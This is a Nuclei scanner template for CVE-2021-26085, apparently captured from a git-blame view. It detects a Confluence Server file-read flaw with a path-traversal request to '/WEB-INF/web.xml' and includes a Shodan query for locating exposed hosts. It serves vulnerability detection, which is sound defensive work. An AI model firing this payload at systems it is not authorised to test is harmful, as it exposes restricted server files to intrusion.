2021-12-20 09:50:14 +00:00
|
|
|
id: CVE-2021-26085
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-12-20 09:50:14 +00:00
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: Atlassian Confluence Server - Local File Inclusion
|
2021-12-20 09:50:14 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches provided by Atlassian to fix the vulnerability.
|
2021-12-20 09:50:14 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://jira.atlassian.com/browse/CONFSERVER-67893
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
|
2021-12-21 12:32:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 5.3
|
2021-12-21 12:32:40 +00:00
|
|
|
cve-id: CVE-2021-26085
|
2023-08-31 11:46:18 +00:00
|
|
|
cwe-id: CWE-425
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.96595
|
2023-10-17 17:52:26 +00:00
|
|
|
epss-percentile: 0.99482
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
2022-03-19 10:42:08 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: atlassian
|
|
|
|
product: confluence_data_center
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: http.component:"Atlassian Confluence"
|
2023-07-11 19:49:27 +00:00
|
|
|
tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive
|
2021-12-20 09:50:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-12-20 09:50:14 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-12-23 16:10:28 +00:00
|
|
|
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
|
2021-12-20 09:50:14 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2023-07-11 19:49:27 +00:00
|
|
|
- <display-name>Confluence</display-name>
|
|
|
|
- com.atlassian.confluence.setup.ConfluenceAppConfig
|
2021-12-20 09:50:14 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|